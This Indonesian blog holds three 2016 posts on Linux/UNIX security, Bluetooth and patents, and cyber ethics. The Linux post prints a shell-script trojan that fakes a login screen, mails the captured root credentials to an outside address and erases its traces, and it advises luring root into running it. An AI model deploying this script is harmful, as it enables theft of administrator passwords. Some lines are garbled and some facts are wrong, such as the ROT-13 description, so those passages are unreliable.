Rabu, 25 Mei 2016

SECURITY LINUX/UNIX



1.   PENDAHULUAN          

Linux merupakan sistem operasi open source nomor satu didunia, linux juga banyak digunakan sebagai server untuk hosting website yang ada di internet saat ini. Sistem operasi dengan icon pinguin ini menjadi alternatif bagi orang yang ingin mendalami jaringan komputer, khususnya di Indonesia. Linux merupakan alternatif bagi anda yang bosan menggunakan Windows atau Mac OS.
Linux telah dirancang untuk menawarkan tampilan user interface yang tidak kalah halus bahkan sangat efektif. Anda dapat menggunakan linux untuk penggunaan dirumah atau dikantor anda, linux sangat bisa diandalkan. Linux juga telah menjadi salah satu sistem yang paling banyak digunakan di dunia. Sebagaian besar pusat data terbesar didunia menggunakan linux. Ada berbagai alasan mengapa andapun sebaiknya mencoba menggunakan linux.
Sampai dengan saat ini sistem keamanan Linux memang lebih baik dibandingkan dengan Windows. Itu juga alasan kenapa orang memakai Linux. Linux sudah sangat aman sejak pertama kali install, jadi tidak perlu takut harus melakukan setingan tambahan.


2.    PEMBAHASAN

Pengertian Linux
Linux atau GNU/Linux adalah sistem operasi bebas yang sangat populer untuk computer, Istilah Linux atau GNU/Linux (GNU) juga digunakan sebagai rujukan kepada keseluruhan distro Linux (Linux distribution), yang di dalamnya disertakan program-program lain pendukung sistem operasi. Contoh program tersebut adalah server web, bahasa pemrograman, basisdata, tampilan desktop (Desktop Environment) (seperti GNOME dan KDE), dan aplikasi perkantoran (office suite) seperti OpenOffice.org, KOffice, Abiword, Gnumeric. Distro Linux telah mengalami pertumbuhan yang pesat dari segi popularitas, sehingga lebih populer dari versi UNIX yang menggunakan sistem lisensi dan berbayar (proprietary) maupun versi UNIX bebas lain yang pada awalnya menandingi dominasi Microsoft Windows dalam beberapa sisi. Linux mendukung banyak perangkat keras komputer, dan telah digunakan di berbagai peralatan dari komputer pribadi, superkomputer dan sistem benam (embedded system), seperti telepon seluler (Ponsel) dan perekam video pribadi. Pada awalnya, Linux dibuat, dikembangkan, dan digunakan oleh peminatnya saja. Kini Linux telah mendapat dukungan dari perusahaan besar seperti IBM dan Hewlett- Packard. Para pengamat teknologi informatika beranggapan kesuksesan ini dikarenakan Linux tidak bergantung kepada vendor (vendor independence), biaya operasional yang rendah, dan kompatibilitas yang tinggi dibandingkan versi UNIX proprietari, serta faktor keamanan dan kestabilannya dibandingkan dengan Microsoft Windows. Ciri-ciri ini juga menjadi bukti atas keunggulan model pengembangan perangkat lunak sumber terbuka (opensource software). Linux ini disebarkan secara luas dengan gratis di bawah lisensi GNU
General Publi License (GPL), yang berarti source code Linux juga tersedia bagi publik. Linux dikembangkan oleh perorangan maupun kelompok yang bekerja secara sukarela. Para pengembang Linux memanfaatkan jaringan Internet untuk melakukan tukar-menukar kode, melaporkan bug, dan membenahi segala masalah yang ada. Setiap orang yang tertarik biasanya bergabung dalam pengembangan Linux ini. Pengembangan Linux pertama kali dilakukan oleh Linux Benedict Torvalds pada tahun 1991 di Universitas Helsinki, Finlandia. Kemudian Linux dikembangkan lagi dengan bantuan dari banyak programmer dan pakar UNIX di Internet. Linux ini bisa diperoleh dari beberapa distribusi yang umum digunakan, misalnya RedHat, Debian, Slackware, Caldera, Stampede Linux, TurboLinux dan lain-lain.

Pengertian UNIX     
Unix atau UNIX adalah sebuah sistem operasi komputer yang diawali dari project Multics (Multiplexed Information and Computing Service) pada tahun 1965 yang dilakukan American Telephone and Telegraph AT&T, General Electric (GE), dan Institut Teknologi Massachusetts (MIT), dengan biaya dari Departemen Pertahanan Amerika (Departement of Defence Advenced Research Project, DARPA atau ARPA), UNIX didesain sebagai Sistem operasi yang portable, multi-tasking dan multi-user.
Sistem operasi Unix digunakan secara luas baik sebagai server atau workstation. Arsitektur Unix dan model client/server merupakan elemen yang paling penting dalam perkembangan internet dan mengubah proses komputasi secara terpusat dalam jaringan dari pada proses tunggal di komputer. Linux, merupakan sistem operasi yang diadopsi dari Unix dan tersedia secara bebas mendapat popularitas sebagai alternatif dari sistem operasi proprietary seperti Microsoft Windows

Komponen Arsitektur Keamanan Linux :
1.        Account Pemakai (user account)
Kekuasaan dalam mengadministrasi sistem secara keseluruhan berada dalam satu account, yakni root. Dengan root, Anda bisa mengontrol sistem file, user, sumber daya (devices), bahkan akses jaringan. Model diktatorial ini memudahkan administrator dalam menangani sistem. Jika ada satu user yang melanggar aturan, root bisa membuat account-nya beku, tanpa mengganggu yang lain. Atau mengatur siapa-siapa saja yang boleh mengakses suatu file, memberikan hak khusus pada user-user tertentu.. Setiap user diatur pula lingkungan di mana dia boleh main-main sepuasnya, atau cuma melihat-lihat. Hal ini memberikan keuntungan bagi pemakai maupun sistem

Keuntungan :

  •  Kekuasaan dalam satu account yaitu root, sehingga mudah dalam administrasi system.
  • Kecerobohan salah satu user tidak berpengaruh kepada system secara keseluruhan.

Masing-masing user memiliki privacy yang ketat
Macam User :
Root       : kontrol system file, user, sumber daya (devices) dan akses jaringan
User       : account dengan kekuasaan yang diatur oleh root dalam melakukan aktifitas dalam system.
Group    : kumpulan user yang memiliki hak sharing yang sejenis terhadap suatu     devices tertentu.

2.      Kontrol Akses secara Diskresi (Discretionary Access control)
Setiap pemakai Linux, memiliki account tersendiri, yang masing-masing dibedakan dengan user name dan password. Setiap file memiliki atribut kepemilikan, group, dan user umum. Satu file, bisa diberikan atribut tertentu, sehingga hanya dapat dibaca atau dieksekusi oleh pemiliknya saja. Pembatasan ketat ini dinamakan Discretionary Access Control (DAC). Hal ini pula yang menyebabkan virus jarang ditemui atau jarang tersebar di Linux. Sebab virus biasanya menulis file ke dalam sistem. Dengan DAC, virus hanya berpengaruh pada file-file yang dimiliki oleh salah seorang user yang mengeksekusi virus tersebut. Sedangkan sistemnya sendiri tidak tersentuh
Discretionary Access control (DAC) adalah metode pembatasan yang ketat, yang meliputi :
  • Setiap account memiliki username dan password sendiri.
  • Setiap file/device memiliki atribut(read/write/execution) kepemilikan, group, dan user umum.
3.      Kontrol Akses Jaringan (Network Access Control)
Linux dapat memilih komputer mana saja yang dapat mengaksesnya. Pembatasan antar jaringan ini dinamakan Network Access Control. Alat pengontrolan akses jaringan ini dinamakan firewall.
Firewall linux 1 :
alat pengontrolan akses antar jaringan yang membuat linux dapat memilih host yang berhak / tidak berhak mengaksesnya.
Fungsi Firewall linux :
Analisa Memeriksa dan pfailkteert iTngC Ppa, klaeltu diperlakukan dengan kondisi yang sudah ditentukan, contoh paket A lakukan tindakan B.

4.        Enkripsi (Encryption)
Enkripsi adalah proses mengacak data sehingga tidak dapat dibaca oleh pihak lain. Pada kebanyakan proses enkripsi, Anda harus menyertakan kunci sehingga data yang dienkripsi dapat didekripsikan kembali. Ilmu yang mempelajari teknik enkripsi disebut kriptografi. Gambaran sederhana tentang enkripsi, misalnya mengganti huruf a dengan n, b dengan m dan seterusnya. Model penggantian huruf sebagai bentuk enkripsi sederhana ini sekarang tidak dipergunakan secara serius dalam penyembunyian data. ROT-13 adalah program yang masih suka dipergunakan. Intinya adalah mengubah huruf menjadi 23 huruf didepannya. Misalnya b menjadi o dan seterusnya. Pembahasan enkripsi akan terfokus pada enkripsi password dan enkripsi komunikasi data.
Enkripsi komunikasi data :
Secure Shell (SSH) à Program yang melakukan loging terhadap komputer lain dalam jaringan, mengeksekusi perintah lewat mesin secara remote dan memindahkan file dari satu mesin ke mesin
Secure socket Layer (SSL) mengenkripsi data yang dikirimkan lewat port http.
Konfigurasi dilakukan di : web server APACHE dengan ditambah PATCH SSL

5.        Logging
Linux memiliki fasilitas logging yang sangat komprehensif. Untuk yang baru saja bermigrasi ke Linux, mungkin belum terbiasa memanfaatkan logging. Pada sistem operasi non UNIX, kebanyakan meminimalkan logging, bahkan tidak ada sama sekali. Logging adalah prosedur di mana sebuah sistem operasi atau aplikasi merekam setiap kejadian dan menyimpan rekaman tersebut untuk dapat dianalisa di kemudian hari. Kejadian yang direkam ini bisa saja menyangkut sistem operasi, atau khusus program-program tertentu saja.

6.        Deteksi penyusupan (Intrusion Detection)
Deteksi penyusupan adalah aktivitas untuk mendeteksi penyusupan secara cepat dengan menggunakan program khusus yang otomatis. Program yang dipergunakan biasanya disebut sebagai Intrusion Detection System (IDS). Tipe dasar dari IDS adalah:
·         Rule-based systems - berdasarkan atas database dari tanda penyusupan atau serangan yang telah dikenal. Jika IDS mencatat lalulintas yang sesuai dengan database yang ada, maka langsung dikategorikan sebagai penyusupan.
·         Adaptive systems - mempergunakan metode yang lebih canggih. Tidak hanya berdasarkan database yang ada, tapi juga membuka kemungkinan untuk mendeteksi terhadap bentuk bentuk penyusupan yang baru.

Contoh kasus Trojan House, memanfaatkan SHELL script UNIX :        
Seorang gadis cantik dan genit peserta kuliah UNIX di sebuah perguruan tinggi memiliki potensi memancing pengelola sistem komputer (administrator pemegang account root . . . hmmm) yang lengah. Ia melaporkan bahwa komputer tempat ia melakukan tugas-tugas UNIX yang diberikan tidak dapat dipergunakan. Sang pengelola sistem komputer tentu saja dengan gagah perkasa ingin menunjukkan kekuasaan sebagai administrator UNIX.
"Well, ini soal kecil. Mungkin password kamu ke blokir, biar saya perbaiki dari tempat kamu", ujar administrator UNIX sombong sambil duduk disebelah gadis cantik dan genit peserta kuliah tersebut.
Keesokan harinya, terjadilah kekacauan di sistem UNIX karena diduga terjadi penyusupan oleh hacker termasuk juga hompepage perguruan tinggi tersebut di-obok-obok, maklum pengelolanya masih sama. Selanjutnya pihak perguruan tinggi mengeluarkan press release bahwa homepage mereka dijebol oleh hacker dari Luar Negeri . . . . hihiii
Nah sebenarnya apa sih yang terjadi ?
Sederhana, gadis cantik dan genit peserta kuliah UNIX tersebut menggunakan program kecil my_login dalam bentuk shell script yang menyerupai layar login dan password sistem UNIX sebagai berikut:
#!/bin/sh
###################################
# Nama program : my_login
# Deskripsi :Program kuda trojan sederhana
# versi 1.0 Nopember 1999
####################################
COUNTER=0
Cat /etc/issue
While [ "$COUNTER" –ne 2 ]
do
let COUNTER=$COIUNTER+1
echo "login: \c"
read LOGIN
stty echo
echo "password: \c"
read PASSWORD
echo "User $LOGIN : $PASSWORD" | mail gadis@company.com
stty echo
echo
echo "Login Incorrect"
done
rm $0
kill –9 $PPID
Apabila program ini dijalankan maka akan ditampilkan layar login seperti layaknya awal penggunaan komputer pdaa sistem UNIX:
Login:
Password:
Lihatlah, Administrator UNIX yang gagah perkasa tadi yang tidak melihat gadis tersebut menjalankan program ini tentunya tidak sadar bahwa ini merupakan layar tipuan. Layar login ini tidak terlihat beda dibanding layar login sesungguhnya.
Seperti pada program login sesungguhnya, sistem komputer akan meminta pemakai untuk login ke dalam sistem. Setelah diisi password dan di enter,maka segera timbul pesan
Login:root
Password: ********
Login Incorrect
Tentu saja Administrator UNIX akan kaget bahwa passwordnya ternyata (seolah-olah) salah. Untuk itu ia segera mengulangi login dan password. Setelah dua kali ia mencoba login dan tidak berhasil, maka loginnya dibatalkan dan kembali keluar UNIX.
Perhatikan program di atas baik-baik, sekali pemakai tersebut mencoba login dan mengisi password pada layar di atas, setelah itu maka otomatis data login dan password tersebut akan di email ke mailto:hacker@company.com. Sampai disini maka si gadis lugu dan genit telah mendapatkan login dan password . . . ia ternyata seorang hacker !!
Walaupun sederhana, jika kita perhatikan lebih jauh lagi, maka program ini juga memiliki beberapa trik hacker lainnya, yaitu proses penghilangan jejak (masih ingat tahapan hacker yang ditulis di atas ?). Proses ini dilakukan pada 2 baris terakhir dari program my_login di atas, yaitu
rm $0
kill –9 $PPID
yang artinya akan segera dilakukan proses penghapusan program my_login dan hapus pula ID dari proses. Dengan demikian hilanglah program tersebut yang tentunya juga menhilangkan barang bukti. Ditambah lagi penghapusan terhadap jejak proses di dalam sistem UNIX. Zap . . . hilang sudah tanda-tanda bahwa hacker nya ternyata seorang gadis peserta kuliahnya.
Sukses dari program ini sebenarnya sangat tergantung dari bagaimana agar aplikasi ini dapat dieksekusi oleh root. Hacker yang baik memang harus berusaha memancing agar pemilik root menjalankan program ini.

3.    PENUTUP

KESIMPULAN
Dari sini, Anda sudah mulai mempunyai kepedulian yang cukup terhadap keamanan jaringan Anda. Secara singkat, sudah pelajari bersama bagaimana arsitektur keamanan di Linux. Jika keamanan sudah diset secara maksimal menurut perspektif kita, maka yang diperlukan hanyalah kerajinan untukmembaca file-file log yang dibuat oleh Linux. Meskipun bisa dibilang bahwa jaringan tidak mempunyai data-data keamanan yang penting, tapi kepedulian terhadap masalah keamanan ini akan memudahkan pekerjaan di kemudian hari. Dengan pesatnya perkembangan sistem informasi, maka perlu bagi para pemelihara jaringanuntuk tetap terlibat dalam isu-isu terakhir dalam bidang teknologi. Ketinggalan terhadap isu bug, virus,dan isu keamanan lainnya, akan membuat jaringan yang dirawat menjadi rawan akan penyusupan.                        





Jumat, 20 Mei 2016

HAK ATAS KEKAYAAAN INTELEKTUAL (HAKI)

BLUETOOTH : Teknologi Komunikasi Wireless untuk Layanan Multimedia dengan Jangkauan Terbatas
           
Perkembangan teknologi mempunyai peran yang sangat signifikan dalam kehidupan sehari-hari. Negara yang menguasai dunia adalah negara yang menguasai teknologi. Amerika serikat, Jerman, Perancis, Rusia dan Cina merupakan contoh negara yang sangat maju dalam bidang teknologi sehingga mereka mampu memberi pengaruh bagi negara lain. Negara-negara tersebut melindungi teknologi mereka secara ketat. Teknologi-teknologi tersebut merupakn cikal bakal dari sebuah kemajuan dan inovasi yang baru yang akan menambah kuat dari temapat atau Negara dimana suatu penemuan baru tersebut dilahirkan Indonesia perlu merangsang warga negaranya untuk mengembangkan teknologi dengan mengembangkan sistem perlindungan terhadap karya intelektual di bidang teknologi yang berupa pemberian hak paten.

Apa itu Hak Paten?
Kata paten, berasal dari bahasa inggris patent, yang awalnya berasal dari kata patere yang berarti membuka diri (untuk pemeriksaan publik), dan juga berasal dari istilah letters patent, yaitu surat keputusan yang dikeluarkan kerajaan yang memberikan hak eksklusif kepada individu dan pelaku bisnis tertentu. Dari definisi kata paten itu sendiri, konsep paten mendorong inventor untuk membuka pengetahuan demi kemajuan masyarakat dan sebagai gantinya, inventor mendapat hak eksklusif selama periode tertentu. Mengingat pemberian paten tidak mengatur siapa yang harus melakukan invensi yang dipatenkan, sistem paten tidak dianggap sebagai hak monopoli.
            Hak Paten merupakan suatu hak yang diberikan oleh negara kepada seseorang terhadap hasil inovasinya pada bidang tertentu. Hak yang diberikan memiliki masa berlaku, sehingga hak paten terhadap inovasi tertentu memiliki waktu terhadap masa berlakunya. Pemegang hak tersebut memiliki wewenang untuk melarang siapapun dalam membuat, menjual bahwa menyewakan inovasi yang telah diberi hak. Namun jika terdapat institusi maupun perorangan yang melanggar aturan mengenai hak paten yang ada, maka pemegang paten berhak menggugat ganti rugi melalui pengadilan negeri setempat.
            Hak Paten adalah hak eksklusif yang diberikan oleh Negara kepada penemu atas hasil penemuannya di bidang teknologi, yang untuk selama waktu tertentu melaksanakan sendiri Invensinya tersebut atau memberikan persetujuannya kepada pihak lain untuk melaksanakannya.
            Berdasarkan pasal 8 ayat 1 Undang-undang Nomor 14 Tahun 2001, disebutkan bahwa jangka waktu yang diberikan kepada pemegang hak paten yaitu selama 20 (dua puluh) tahun terhitung sejak tanggal penerimaan dan jangka waktu itu tidak dapat diperpanjang. Sesuai dengan ketentuan dalam Pasal 9 Undang-undang Nomor 14 Tahun 2001, disebutkan bahwa jangka waktu yang diberikan kepada pemegang hak paten sederhana yaitu selama 10 (sepuluh) tahun terhitung sejak tanggal penerimaan dan jangka waktu itu tidak dapat diperpanjang. Terdapat sanksi yang tegas dari pemerintah kepada pelanggar hak paten. Sanksi yang diberikan biasanya berupa denda uang tunai sampai pidana sekalipun.

Apa Itu Bluetooth?

Bluetooth adalah spesifikasi industri untuk jaringan kawasan pribadi (personal area networks atau PAN) tanpa kabel. Bluetooth menghubungkan dan dapat dipakai untuk melakukan tukar-menukar informasi di antara peralatan-peralatan. Spesifiksi dari peralatan Bluetooth ini dikembangkan dan didistribusikan oleh kelompok Bluetooth Special Interest Group. Bluetooth beroperasi dalam pita frekuensi 2,4 Ghz dengan menggunakan sebuah frequency hopping traceiver yang mampu menyediakan layanan komunikasi data dan suara secara real time antara host-host bluetooth dengan jarak terbatas. Kelemahan teknologi ini adalah jangkauannya yang pendek dan kemampuan transfer data yang rendah.
Pada dasarnya bluetooth diciptakan bukan hanya untuk menggantikan atau menghilangkan penggunaan kabel didalam melakukan pertukaran informasi, tetapi juga mampu menawarkan fitur yang baik untuk teknologi mobile wireless dengan biaya yang relatif rendah, konsumsi daya yang rendah, interoperability yang menjanjikan, mudah dalam pengoperasian dan mampu menyediakan layanan yang bermacam-macam.
Kehadiran bluetooth membuat seseorang tak lagi dipusingkan dengan kabel apa, warna apa, menuju ke mana, dan harus dicolok ke mana. Fungsi interkoneksi antarperalatan tersebut dapat digantikan oleh chipset bluetooth yang dipasang secara built-in pada peralatan elektronik terkait.
Nama "bluetooth" berasal dari nama raja di akhir abad sepuluh, Harald Blatand yang di Inggris juga dijuluki Harald Bluetooth. Konotasi demikian tidaklah jauh keliru, karena menurut cerita mitologi, Bluetooth konon berambut dan berkulit gelap. Ia gemar makan blueberries atau arbei, maka layak bila gigi Blatand menjadi kebiru-biruan atau bluetooth.
Ia adalah raja Denmark yang telah berhasil menyatukan suku-suku yang sebelumnya berperang, termasuk suku dari wilayah yang sekarang bernama Norwegia dan Swedia. Bahkan wilayah Scania di Swedia, tempat teknologi bluetooth ini ditemukan juga termasuk daerah kekuasaannya. Kemampuan raja itu sebagai pemersatu juga mirip dengan teknologi bluetooth sekarang yang bisa menghubungkan berbagai peralatan seperti komputer personal dan telepon genggam.
Sedangkan logo bluetooth berasal dari penyatuan dua huruf Jerman yang analog dengan huruf H dan B (singkatan dari Harald Bluetooth), yaitu H (Hagall) dan Runic letter (Blatand) yang kemudian digabungkan.
Awal mula dari Bluetooth adalah sebagai teknologi komunikasi wireless (tanpa kabel) yang beroperasi dalam pita frekuensi 2,4 GHz unlicensed ISM (Industrial, Scientific and Medical) dengan menggunakan sebuah frequency hopping tranceiver yang mampu menyediakan layanan komunikasi data dan suara secara real-time antara host-host bluetooth dengan jarak jangkauan layanan yang terbatas (sekitar 10 meter).
Bluetooth berupa card yang menggunakan frekuensi radio standar IEEE 802.11 dengan jarak layanan yang terbatas dan kemampuan data transfer lebih rendah dari card untuk Wireless Local Area Network (WLAN).
Pada bulan Mei 1998, 5 perusahaan promotor yaitu Ericsson, IBM, Intel, Nokia dan Toshiba membentuk sebuah Special Interest Group (SIG) dan memulai untuk membuat spesifikasi yang mereka namai ‘bluetooth’. Pada bulan Juli 1999 dokumen spesifikasi bluetooth versi 1.0 mulai diluncurkan. Pada bulan Desember 1999 dimulai lagi pembuatan dokumen spesifikasi bluetooth versi 2.0 dengan tambahan 4 promotor baru yaitu 3Com, Lucent Technologies, Microsoft dan Motorola. Saat ini, lebih dari 1800 perusahaan di berbagai bidang antara lain di bidang semiconductor manufacture, PC manufacture, mobile network carrier, perusahaan-perusahaan automobile dan air lines bergambung dalam sebuah konsorsium sebagai adopter teknologi bluetooth. Perusahaan-perusahaan terkemuka tersebut antara lain seperti Compaq, Xircom, Phillips, Texas instruments, Sony, BMW, Puma, NEC, Casio, Boeing, dsb.  Walaupun standar Bluetooth SIG saat ini ‘dimiliki’ oleh grup promotor tetapi ia diharapkan akan menjadi sebuah standar IEEE (802.15). 
Saat ini lebih dari 2.000 perusahaan atau anggota komunitas pecinta bluetooth tergabung dalam SIG. Dengan bluetooth mereka menawarkan nilai lebih dalam produknya untuk membidik pasar pelanggan papan atas. Dalam 2-3 tahun mendatang, bluetooth dipastikan bakal diproduksi secara massal dan diintegrasikan ke dalam aneka produk peralatan perkantoran, rumah tangga, kesehatan, peralatan kedokteran, otomotif, musik, game, dan entertainment. Bluetooth bakal mengubah secara drastis gaya hidup dan cara kerja peralatan perkantoran dan perkakas rumah tangga.
Teknologi Bluetooth menghubungkan begitu banyak gadget kita, tanpa kita sadari teknologi ini sangat memudahkan kita dalam melakukan aktifitas sehari-hari. Bluetooth membantu kita mendengarkan musik, berbicara di telepon, dan bermain video game, semua menjadi lebih nyaman tanpa adanya kabel yang semrawut disekitar kita.
Bluetooth menjadi teknologi yang sangat awam pada saat ini. Dengan adanya Bluetooth, menghubungkan antara satu perangkat elektronik dengan perangkat lainnya pun menjadi lebih sederhana. Seiring dengan perkembangan, berbagai perangkat pun banyak dilengkapi dengan Bluetooth. Dari handphone, komputer ataupun headset.

Bagaimana Cara Kerja Bluetooth?
Jaringan bluetooth mentransmisikan data melalui gelombang radio berdaya rendah. Teknologi ini beroperasi pada frekuensi 2,45 gigahertz (tepatnya antara 2,402 dan 2.480 GHz). Pita frekuensi ini telah disisihkan oleh kesepakatan internasional untuk penggunaan perangkat industri, ilmiah, dan medis (ISM – industrial, scientific and medical).
Beberapa alat yang mungkin sudah menggunakan pita frekuensi radio ini. Monitor bayi, pembuka pintu garasi, dan generasi terbaru dari telepon nirkabel semua menggunakan frekuensi dalam band ISM. Memastikan bahwa Bluetooth dan perangkat lain tidak mengganggu satu sama lain telah menjadi bagian penting dari proses desain Bluetooth.
Salah satu cara perangkat Bluetooth menghindari interfensi sistem lain adalah dengan mengirimkan sinyal yang sangat lemah sekitar 1 milliwatt. Sebagai informasi, sinyal terkuat yang dapat dikirim telepon seluler adalah 3 watt. Daya rendah membatasi jangkauan perangkat Bluetooth sekitar 10 meter, mengurangi kemungkinan interfensi antara sistem komputer dan telepon portabel atau televisi. Bahkan dengan daya rendah, Bluetooth tidak memerlukan line of sight antara perangkat komunikasi.
Bluetooth dapat menghubungkan delapan perangkat secara bersamaan. Dengan semua perangkat tersebut dalam radius yang sama yaitu 10 meter, Anda mungkin berpikir mereka akan mengganggu satu sama lain, tapi itu kecil kemungkinan terjadi. Bluetooth menggunakan teknik yang disebut spread-spektrum frekuensi hopping yang membuat jarang terjadinya lebih dari satu perangkat untuk transmisi di frekuensi yang sama pada saat yang bersamaan. Pada teknik ini, perangkat akan menggunakan frekuensi yang dipilih secara acak dalam rentang yang ditentukan, berubah dari satu frekuensi ke frekuensi yang lain secara teratur. Dalam kasus Bluetooth, pemancar mengubah frekuensi 1.600 kali setiap detik. Oleh karena setiap transmitter Bluetooth menggunakan transmisi spread-spectrum otomatis, kecil kemungkinan dua pemancar akan berada di frekuensi yang sama pada saat yang bersamaan.

Low Power, Low Speed

Bluetooth telah berkembang menjadi pilihan konektivitas mobile yang sempurna, karena tidak memakan banyak energi, dan sinyal tidak dipancarkan jarak jauh. Kecepatan transfer data Bluetooth tidak terlalu tinggi, maka ketika penggunaan menggunakannya untuk streaming musik atau berbicara di telepon akan baik-baik saja, tapi untuk mentransfer data ukuran besar akan memakan waktu terlalu lama sehingga tidak praktis. Konsumsi daya yang rendah juga penting ketika Bluetooth digunakan pada perangkat mobile.


Fungsi Security

Bluetooth dirancang untuk memiliki fitur-fitur keamanan sehingga dapat digunakan secara aman baik dalam lingkungan bisnis maupun rumah tangga. Fitur-fitur yang disediakan bluetooth antara lain sebagai berikut:
  • Enkripsi data. 
  • Autentikasi user 
  • Fast frekuensi-hopping (1600 hops/sec) 
  • Output power control 
Fitur-fitur tersebut menyediakan fungsi-fungsi keamanan dari tingkat keamanan layer fisik/ radio yaitu gangguan dari penyadapan sampai dengan tingkat keamanan layer yang lebih tinggi seperti password dan PIN. 

Kesimpulan
Dari beberapa penjelasan di atas, terlihat bahwa bluetooth mampu menawarkan solusi yang cukup efektif dan efisien di dalam memberikan layanan kepada user untuk melakukan transfer data dengan kecepatan kurang dari 1 Mbit/s dan jangkauan yang relatif pendek. Teknologi bluetooth masih memungkinkan untuk terus berkembang menuju kematangan baik dari sisi standarisasi maupun aplikasi yang dapat diterapkan. Dengan pertimbangan bahwasannya bluetooth mampu menyediakan berbagai macam aplikasi dan layanan dan dengan biaya yang relatif murah, mudah dalam pengoperasian, interoperability yang menjanjikan serta didukung oleh berbagai vendor besar di bidang telekomunikasi maupun komputer, dan lebih dari 1800 perusahaan telah bergabung sebagai adopter teknologi ini, maka tidak mustahil teknologi bluetooth suatu saat akan menjadi salah satu primadona untuk digunakan baik untuk keperluan rumah tangga atau perkantoran/bisnis.
Dengan sedikit tulisan ini diharapkan dapat memberikan gambaran baru tentang tekonologi bluetooth kepada pembaca dan dapat memberi atau menambah wawasan yang baru terhadap perkembangan komunikasi wireless. 

Contoh Kasus Hak Paten Bluetooth
Wi-Lan gugat Blackberry
Wi-Lan, Sebuah perusahaan di Amerika Serikat, dikabarkan telah menggugat RIM (Researh in Motion)selaku produsen handset Blackberry yang dituding telah melanggan paten milik perusahaan asal AS itu yang berkaitan dengan teknologi Bluetooth. Perusahaan AS, Wi-Lan mengklaim bahwa pihaknya telah mengajukan gugatannya ke pengadilan distrik di Florida terhadap RIM.Wi-Lan yang memiliki lisensi kekayaan intelektual untuk lebih dari 255 perusahaan di dunia, seperti diberitakan Reuters, menyatakan bahwa RIM melanggar U.S. Patent No. 6,260,168 yang berkaitan dengan teknologi Bluetooth.Wi-Lan menggugat RIM karena menuduh sejumlah produk besutan RIM, seperti tablet Playbook dan berbagai smartphone, termasuk tipe Bold Torch, Pearl, dan Storm telah menggunakan teknologi yang melanggar paten miliknya. Dengan meminta ganti rugi yang belum ditentukan pihak Wi-Lan, Wi-Lan juga berharap pihak terkait dapat memblokir sejumlah perangkat besutan RIM yang dituding melanggar patennya.

Daftar Pustaka

  1. Bluetooth Special Interest Group, Baseband Specification.
  2. Bluetooth Special Interest Group, Bluetooth Security Arsitechture.
  3. https://id.wikipedia.org/wiki/Paten
  4. http://stiawan89.blogspot.co.id/2013/06/hak-paten.html
Tri Susanto, Engineer di laboratorium Quality Reliability Security- RisTI, TELKOM 
<trissto@risti.telkom.co.id>



Jumat, 15 April 2016

ETIKA PROFESIONALISME TEKNOLOGI & KOMUNIKASI (CYBER)

Cyber Crime
         Secara sederhana cyber crime dapat diartikan sebagai segala jenis aktifitas kriminal yang menggunakan teknologi telematika sebagai medianya. Bentuk dari cyber crime ini macam-macam, dari mulai yang ‘low tech’ seperti pencemaran nama baik melalui media sosial sampai yang ‘high tech’ seperti pencurian data kartu kredit dan data nasabah lainnya seperti yang pernah terjadi pada jaringan online game SonyMotif dati tindakan cyber crime ini juga bisa macam-macam, tidak semuanya bermotifkan kebencian atau  mencari keuntungan senata, tapi ada juga yang bermotif moral.
          Contoh dari tindakan cyber crime bermotif moral adalah yang terjadi pada situs perselingkuhan Ashley Madison, dimana seorang/sekelompok peretas berhasilmembobol situs tersebut, dan mengambil begitu banyak data anggotanya, kemudian mereka mengancam akan mempublikasikan siapa saja pelaku perselingkuhan di situs tersebut jika pengelola tidak segera menutup layanannya. Dan sekarang sejumlah data mulai disebar ke publik, karena pengelola masih bersikeras tidak mau tunduk kepada ancaman sang peretas.

Cyber Security
            Sesuai terminologinya, cyber security adalah aktifitas untuk melakukan pengamanan terhadap sumber daya telematika demi mencegah terjadinya tindakan cyber crime seperti dijelaskan sebelumnya. Dan seperti juga cyber crime, spektrum dari aktifitas cyber security ini juga sangat luas. Sebuah proses peningkatan keamanan (security hardening), umumnya meliputi masalah teknis,  seperti pengamanan dari sisi jaringan, sistem operasi, keamanan data dan source code aplikasi. Institusi keuangan dan telekomunikasi secara rutin menyewa konsultan keamanan untuk melakukan kegiatan ‘penetration testing’. Pen Test ini dilakukan untuk menguji sejauh mana sistem yang merka punya dapat bertahan dari sernagan-serangan yang akan mengeksploitasi sistem tersebut. Biasanya ‘pen test’ ini dilanjutkan dengan sejumlah rekomendasi perbaikan di titik-titik vulnerabilities yang terdeteksi. Tapi selain dari sisi teknis, kegiatan pengutatan keamanan juga harus meliputi pengamanan terhadap ancaman dari personil internal. Harus ada sejumlah protokol atau SOP yang harus dilakukan oleh personilnya. Bahkan bisa dibilang personil internal adalah faktor ancaman keamanan paling tinggi dibandingkan hal-hal teknis.

Cyber Law
            Cyber Law ialah sebuah aturan yang berbentuk hukum yang di buat khusus untuk dunia digital atau internet. Dengan makin banyak dan berkembangnya tindak kriminal dan kejahatan yang ada di dunia internet, maka mau tidak mau hukum dan aturan tersebut harus dibuat. Cyber Law sendiri ruang lingkupnya meliputi setiap aspek yang berhubungan dengan orang perorangan atau subyek hukum yang menggunakan dan memanfaatkan teknologi internet yang dimulai pada saat mulai online dan memasuki dunia cyber atau maya. Cyber Law sendiri merupakan istilah yang berasal dari Cyberspace Law.
            Mengingat para penegak hukum akan menghadapi kesulitan jika harus membuktikan suatu persoalan yang diasumsiakan sebagai “maya”, sesuatu yang tidak terlihat dan semu. Di internet hukum itu adalah cyber law, hukum yang khusus berlaku di dunia cyber. Secara luas cyber law bukan hanya meliputi tindak kejahatan di internet, namun juga aturan yang melindungi para pelaku e-commerce, e-learning, pemegang hak cipta, rahasia dagang, paten, e-signature dan masih banyak lagi.

Cyber Threat
            Definisi threat dalam operasi informasi adalah semua jenis ancaman yang menggangu kerahasiaan (confidentiality), integritas (integrity), dan ketersediaan (availability) informasi. Threat ini bisa berupa ancaman secara fisik yang disengaja dan/atau bencana alam serta ancaman yang muncul dari ranah cyber. Ancaman yang muncul dari ranah cyber ini dikenal sebagai cyber threat.

Cyber Attack
            Definisi attack dalam operasi informasi adalah semua jenis tindakan yang sengaja dilakukan untuk menggangu kerahasiaan ( confidentiality), integritas (integritiy), dan ketersediaan (availability) informasi. Tindakan ini bisa ditujukan untuk menggangu secara fisik maupun dari alur logic sistem informasi. Cyber Attack merupakan upaya mengganggu informasi yang berfokus pada alur logic sistem informasi.
